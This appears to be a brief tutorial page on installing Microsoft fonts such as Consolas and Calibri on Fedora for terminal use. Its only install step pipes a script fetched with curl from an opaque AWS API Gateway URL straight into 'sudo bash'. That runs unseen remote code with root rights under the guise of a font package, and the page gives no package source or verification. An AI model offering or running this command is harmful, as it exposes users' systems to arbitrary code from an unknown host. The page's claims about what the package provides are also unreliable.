📜  fedora microsoft font - Shell-Bash (1)

📅  最后修改于: 2023-12-03 15:00:44.570000             🧑  作者: Mango

Fedora Microsoft Font - Shell/Bash

Are you tired of poorly rendered fonts in your programming terminal? Do you find yourself squinting at code all day? Look no further than the Fedora Microsoft Font package!

Installation

Simply open your terminal and run the following command:

sudo dnf install curl cabextract -y && \
  curl -L https://pljvzgfo4k.execute-api.us-east-1.amazonaws.com/download-ms | sudo bash && \
  echo "Installing Microsoft fonts ..."

This will download and install the Microsoft fonts package on your Fedora system.

Usage

Once installed, you can use the new fonts in your terminal emulator of choice. Simply navigate to your terminal's settings, and select one of the following fonts:

  • Consolas
  • Calibri
  • Cambria
  • Candara
  • Corbel

You'll immediately notice that your code now looks crisper and easier to read. Enjoy!

Conclusion

Thanks to the Fedora Microsoft Font package, you can enjoy beautifully rendered fonts in your terminal without any extra effort. Happy programming!